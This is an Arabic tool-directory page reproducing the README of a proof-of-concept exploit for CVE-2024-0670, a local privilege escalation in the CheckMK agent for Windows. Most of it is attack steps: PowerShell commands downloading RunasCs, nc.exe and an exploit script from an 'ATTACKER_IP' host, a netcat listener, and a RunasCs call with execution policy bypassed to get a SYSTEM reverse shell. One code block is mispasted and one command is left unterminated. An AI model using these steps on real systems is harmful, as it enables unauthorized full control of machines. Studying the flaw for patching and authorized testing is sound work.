Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit — يحتوي هذا المستودع على عرض استغلال لثغرة CVE-2024-0670، وهي ثغرة تصعيد صلاحيات محلية تؤثر على وكيل CheckMK لنظام ويندوز. تسمح الثغرة لمستخدم منخفض الصلاحيات بالحصول على صلاحيات SYSTEM من خلال إساءة استخدام مسارات ملفات قابلة للكتابة تتم معالجتها بواسطة آلية إصلاح MSI. | Kitploit
أدوات/GitHubGitHub/elsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit
تصعيد الامتيازاتتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائية
GitHubelsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit

يحتوي هذا المستودع على عرض استغلال لثغرة CVE-2024-0670، وهي ثغرة تصعيد صلاحيات محلية تؤثر على وكيل CheckMK لنظام ويندوز. تسمح الثغرة لمستخدم منخفض الصلاحيات بالحصول على صلاحيات SYSTEM من خلال إساءة استخدام مسارات ملفات قابلة للكتابة تتم معالجتها بواسطة آلية إصلاح MSI.

عرض المستودع
3منذ 9 أشهرلم تتم المراجعة بعد

CVE-2024-0670 – تصعيد الصلاحيات المحلية في وكيل CheckMK (PoC)

يحتوي هذا المستودع على إثبات مفهوم بسيط وواضح للثغرة CVE-2024-0670، وهي ثغرة تصعيد صلاحيات محلية في وكيل CheckMK لنظام Windows. يمكن لمستخدم منخفض الصلاحيات الحصول على صلاحيات SYSTEM من خلال استغلال مسارات ملفات مؤقتة قابلة للكتابة يتم تنفيذها أثناء إصلاح MSI.

🔍 ملخص الثغرة

  • البائع: Tribe29
  • CVE: CVE-2024-0670
  • النشرة الأمنية: https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/

أثناء إصلاح MSI، ينفذ CheckMK ملفات ضمن:

root@kitploit:~
  C:\Windows\Temp\

إذا تمكن مستخدم عادي من وضع ملفات هناك بأسماء يمكن توقعها، يمكنه تنفيذ أوامر بصلاحيات NT AUTHORITY\SYSTEM.

يضع هذا الاستغلال عدة أسماء ملفات حمولة ويشغّل إصلاح MSI لتحقيق التنفيذ بصلاحيات SYSTEM.

📂 الملفات

root@kitploit:~
RunasCs.exe     → runas replacement (plaintext password support)
nc.exe          → Netcat (reverse shell)
exploit.ps1     → CVE-2024-0670 exploit script
README.md       → documentation

🛠 المتطلبات

  • مستخدم Windows منخفض الصلاحيات
  • تفعيل PowerShell
  • تثبيت وكيل CheckMK لنظام Windows
  • القدرة على تنزيل الملفات
  • بايثون (لخادم HTTP بسيط)
  • مستمع Netcat على جهاز المهاجم

📡 تشغيل خادم HTTP

root@kitploit:~
  C:\Windows\Temp\

📥 تنزيل الأدوات على الجهاز الهدف

root@kitploit:~
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1

🚀 تشغيل الاستغلال

شغّل مستمعًا على جهازك:

root@kitploit:~
nc -lvnp 1111
root@kitploit:~
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"

في حال نجاح العملية، ستحصل على قشرة عكسية بصلاحيات SYSTEM.

🔧 بناء RunasCs يدويًا (اختياري)

root@kitploit:~
net4: 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs 

net2: 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs

⚖️ إخلاء مسؤولية قانوني

هذا المشروع مخصص للأغراض التعليمية واختبار الاختراق المصرح به فقط. لا تستخدمه لأغراض غير قانونية. المؤلف غير مسؤول عن أي إساءة استخدام.

تنزيل الأداة